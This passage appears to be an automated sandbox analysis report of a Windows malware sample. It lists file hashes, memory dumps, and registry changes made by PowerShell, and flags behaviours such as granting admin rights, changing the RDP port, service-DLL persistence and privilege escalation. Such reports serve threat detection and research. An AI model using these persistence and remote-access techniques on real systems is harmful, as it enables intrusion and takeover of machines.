SHA512 9e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31

memory/936-69-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\CSC1046.tmp

MD5 37cbf8ed51ff6f9ead6d150889a98d7c
SHA1 00b86c549fa7ed97eb8be0bbef026d40a3d09864
SHA256 5e6f61e1e5293527e39494a00c5a80f0148fc285b3781918f357f5118ce3db58
SHA512 66ba96a6c7c1dcfcd62fd7942d9b3c7f8de49abd6444c50d2119d2527c63812eff1c97649842223655f60d14ce993df21719ff24f1e1d73411b020f531c6fc44

C:\Users\Admin\AppData\Local\Temp\RES1047.tmp

MD5 c07edee87321506129963d52adf00691
SHA1 852a61e06d9781be17f7859e0fcaedaa6890046f
SHA256 bfdccf4d9fe83ebebf5fb9cade82cefd977caa61594e7718f83f1ab7eb7b23d6
SHA512 144cffc7d5db2f3fe4591b1089e33ffeaaf58f3854c855e0c8770e28acb098cf092fe7d417640316cd2039f4361beff3b55fd703c87ff289061ed09300e2803e

C:\Users\Admin\AppData\Local\Temp\zzulzwbo.dll

MD5 fc1fcea0e377f949ca523347a5489a06
SHA1 36fd47bac965a954fdd2a33133c1db4171b50d27
SHA256 5f1a684fece7d66b11664497d19048947b8eacfbdb5cbaa44577ffeae500daad
SHA512 60385ab361e3c359954897100050327a480e09d41e0a4113ad4f8b020b049a3b8f018451ec67640b72261b35e0c7a9b89a92b09955dde0132b3561f761a5a15c

C:\Users\Admin\AppData\Local\Temp\zzulzwbo.pdb

MD5 6c46f8fcebd944e2bec33c0fc73af629
SHA1 419a7f6fe49d69500e11df17a565dcc961723fcf
SHA256 b5d600eb0b73bd27e7cb7cb9149717ee989037036cc229cbf95e36d17f5592a7
SHA512 4a5d2046beb96c53e6a10da4ac0fdaa5e7be2d2f0f003f6d6081a86323a09a61ecd7fe24dabe9691144c110b0d37cb0904597141089634df2c6a0b48418bc5f7

C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1

MD5 00fb904b2dd958760943b89400e9b7f9
SHA1 8c825862b6f70cbaef991525f31100f713e61e7d
SHA256 392e751cec2e13cbbea5161ae4044532961f8e9013cebaa120ac7553388c919a
SHA512 ee4c598b268768f2a2063064ff2a771042bfa5b41e4c5029cb297a17c265a93ab749a3ffecfe28d9e5084068d77e487d14291e780a3d6da1e0fcfbc26b6bc28a

memory/588-76-0x000000000241D000-0x000000000241E000-memory.dmp

memory/1056-75-0x00000000020D0000-0x00000000020D2000-memory.dmp

memory/560-77-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 7870e7807fd0aa185ee82df60bcc0c92
SHA1 b82913e640f225175720a885dd3e0f020c3b5cb9
SHA256 57c5bab0dc0258bc54b73d032dd83dbbb82a8cf6bc2b0ea0588011518e08e166
SHA512 9829c8bb325e56cc2be7eac7a5898890474ff02b79ddce4d82376b09c4f0a833cffd4a2f98d142821e1ce909b4d752b2bf561480d8cbfa02cf8c4394f580eae9

memory/560-80-0x000007FEEB060000-0x000007FEEBBBD000-memory.dmp

memory/560-83-0x0000000002642000-0x0000000002644000-memory.dmp

memory/560-84-0x0000000002644000-0x0000000002647000-memory.dmp

memory/560-85-0x0000000002647000-0x0000000002648000-memory.dmp

memory/560-82-0x0000000002640000-0x0000000002642000-memory.dmp

memory/560-81-0x000000001B7C0000-0x000000001BABF000-memory.dmp

memory/1160-86-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 7870e7807fd0aa185ee82df60bcc0c92
SHA1 b82913e640f225175720a885dd3e0f020c3b5cb9
SHA256 57c5bab0dc0258bc54b73d032dd83dbbb82a8cf6bc2b0ea0588011518e08e166
SHA512 9829c8bb325e56cc2be7eac7a5898890474ff02b79ddce4d82376b09c4f0a833cffd4a2f98d142821e1ce909b4d752b2bf561480d8cbfa02cf8c4394f580eae9

memory/1160-89-0x000007FEEB060000-0x000007FEEBBBD000-memory.dmp

memory/560-90-0x000000000264C000-0x000000000266B000-memory.dmp

memory/1160-92-0x0000000002820000-0x0000000002822000-memory.dmp

memory/1160-93-0x0000000002822000-0x0000000002824000-memory.dmp

memory/1160-91-0x000000001B8F0000-0x000000001BBEF000-memory.dmp

memory/1160-94-0x000000000282C000-0x000000000284B000-memory.dmp

memory/1160-95-0x0000000002824000-0x0000000002827000-memory.dmp

memory/1160-96-0x0000000002827000-0x0000000002828000-memory.dmp

memory/792-97-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 7870e7807fd0aa185ee82df60bcc0c92
SHA1 b82913e640f225175720a885dd3e0f020c3b5cb9
SHA256 57c5bab0dc0258bc54b73d032dd83dbbb82a8cf6bc2b0ea0588011518e08e166
SHA512 9829c8bb325e56cc2be7eac7a5898890474ff02b79ddce4d82376b09c4f0a833cffd4a2f98d142821e1ce909b4d752b2bf561480d8cbfa02cf8c4394f580eae9

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/792-101-0x000007FEEB060000-0x000007FEEBBBD000-memory.dmp

memory/792-102-0x000000001B950000-0x000000001BC4F000-memory.dmp

memory/792-103-0x0000000002650000-0x0000000002652000-memory.dmp

memory/792-104-0x000000000265C000-0x000000000267B000-memory.dmp

memory/792-105-0x0000000002652000-0x0000000002654000-memory.dmp

memory/792-106-0x0000000002654000-0x0000000002657000-memory.dmp

memory/792-107-0x0000000002657000-0x0000000002658000-memory.dmp

memory/1584-108-0x0000000000000000-mapping.dmp

C:\Windows\system32\rfxvmt.dll

MD5 dc39d23e4c0e681fad7a3e1342a2843c
SHA1 58fd7d50c2dca464a128f5e0435d6f0515e62073
SHA256 6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
SHA512 5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

memory/1676-110-0x0000000000000000-mapping.dmp

memory/1964-111-0x0000000000000000-mapping.dmp

memory/1396-112-0x0000000000000000-mapping.dmp

memory/844-113-0x0000000000000000-mapping.dmp

memory/1352-114-0x0000000000000000-mapping.dmp

memory/1324-115-0x0000000000000000-mapping.dmp

memory/320-116-0x0000000000000000-mapping.dmp

memory/1516-117-0x0000000000000000-mapping.dmp

memory/1636-118-0x0000000000000000-mapping.dmp

memory/1600-119-0x0000000000000000-mapping.dmp

memory/1812-120-0x0000000000000000-mapping.dmp

memory/936-121-0x0000000000000000-mapping.dmp

memory/1580-122-0x0000000000000000-mapping.dmp

memory/1192-123-0x0000000000000000-mapping.dmp

memory/1684-124-0x0000000000000000-mapping.dmp

memory/1584-125-0x0000000000000000-mapping.dmp

memory/1676-126-0x0000000000000000-mapping.dmp

memory/1092-127-0x0000000000000000-mapping.dmp

memory/1956-128-0x0000000000000000-mapping.dmp

memory/1380-129-0x0000000000000000-mapping.dmp

\Windows\Branding\mediasrv.png

MD5 b110f38845e18a04ab59a7d8a134ef40
SHA1 8119030034e6fbe62d875e824b5233c1f29d61a0
SHA256 1cbd533a8cf6875e9b9bc60b11711b591bd30aac6377a11ee90c2735182414ea
SHA512 80eb80651141c2e00165f089700cc15eb3c5e5eee4ce4e91759e63f5230db8445bc3793c0f5fd259f98ce2939f19633fe7225db990e6574fd739f1d29cf7f223

\Windows\Branding\mediasvc.png

MD5 5768a809b9fcbff117dffa8cbf2e8852
SHA1 a056e76d15bc7509d0361175b2ae4ba348460cd6
SHA256 8ab19cdbe2b963c8bcf8cac6a11e003423ec91ffad88d885d550beb835e46094
SHA512 99d14d6b3c6cf2e872def0b5dd76ffd81d4c71b577bf5fa4700dbb524d5d26bf09d4ffab2dfc6d493303711b635669f35e7cfc90578e6cc2e2f251f422818b8b

memory/1700-132-0x0000000000000000-mapping.dmp

memory/1600-133-0x0000000000000000-mapping.dmp

memory/1812-134-0x0000000000000000-mapping.dmp

memory/1696-135-0x0000000000000000-mapping.dmp

memory/1708-136-0x0000000000000000-mapping.dmp

memory/780-137-0x0000000000000000-mapping.dmp

memory/676-138-0x0000000000000000-mapping.dmp

memory/1704-139-0x0000000000000000-mapping.dmp

memory/1776-140-0x0000000000000000-mapping.dmp

memory/1628-141-0x0000000000000000-mapping.dmp

memory/1524-142-0x0000000000000000-mapping.dmp

memory/456-143-0x0000000000000000-mapping.dmp

memory/1724-144-0x0000000000000000-mapping.dmp

memory/1188-145-0x0000000000000000-mapping.dmp

memory/1812-146-0x0000000000000000-mapping.dmp

memory/1176-147-0x0000000000000000-mapping.dmp

memory/1176-149-0x000007FEEB060000-0x000007FEEBBBD000-memory.dmp

memory/1176-150-0x00000000011D0000-0x00000000011D2000-memory.dmp

memory/1176-151-0x00000000011D2000-0x00000000011D4000-memory.dmp

memory/1176-152-0x00000000011D4000-0x00000000011D7000-memory.dmp

memory/1176-153-0x00000000011DB000-0x00000000011FA000-memory.dmp

memory/1092-154-0x0000000000000000-mapping.dmp

memory/780-155-0x0000000000000000-mapping.dmp

memory/1168-156-0x0000000000000000-mapping.dmp

memory/2004-157-0x0000000000000000-mapping.dmp

memory/2036-158-0x0000000000000000-mapping.dmp

memory/912-159-0x0000000000000000-mapping.dmp

\??\PIPE\lsarpc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

\??\PIPE\samr

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Analysis: behavioral2

Detonation Overview

Submitted

2021-09-02 16:25

Reported

2021-09-02 16:55

Platform

win10v20210408

Max time kernel

1710s

Max time network

1741s

Command Line

"C:\Users\Admin\AppData\Local\Temp\472208d7ba18d4c14b7e90b9db5d6feb.exe"

Signatures

Grants admin privileges

Modifies RDP port number used by Windows

Sets DLL path for service in the registry

persistence

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_ymxdzjh2.nfm.psm1 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\mediasrv.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\mediasrv.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\mediasvc.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\wupsvc.jpg C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_qaeldrbj.blu.ps1 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\wupsvc.jpg C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIF506.tmp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIF526.tmp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIF527.tmp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\mediasvc.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\Basebrd C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIF497.tmp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\ShellBrd C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIF4F6.tmp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\57fd7ae31ab34c2c = ",33,HKCU,SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Extensible Cache," C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\PMDisplayName = "Internet [Protected Mode]" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Flags = "33" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1200 = "3" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "Computer" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\LowIcon = "inetcpl.cpl#005422" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\DisplayName = "Local intranet" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags = "3" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "My Computer" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Icon = "shell32.dll#0016" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Icon = "inetcpl.cpl#00004480" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\CurrentLevel = "66816" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Flags = "71" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Description = "Your computer" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\http = "3" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\IE5_UA_Backup_Flag = "5.0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\e1be3f182420a0a0 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c000000 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Icon = "shell32.dll#0018" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\PMDisplayName = "Trusted sites [Protected Mode]" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\DisplayName = "Trusted sites" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\16\52C64B7E C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1400 = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1200 = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1400 = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\CurrentLevel = "73728" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Flags = "33" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\PMDisplayName = "Restricted sites [Protected Mode]" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Flags = "33" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data." C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\DisplayName = "Trusted sites" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\PMDisplayName = "Local intranet [Protected Mode]" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\LowIcon = "inetcpl.cpl#005424" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Icon = "inetcpl.cpl#00004481" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ftp = "3" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\@ivt = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZonesSecurityUpgrade = 6ead5207ab2cd701 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\CurrentLevel = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Flags = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A

Runs net.exe

Script User-Agent

Description Indicator Process Target
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\472208d7ba18d4c14b7e90b9db5d6feb.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
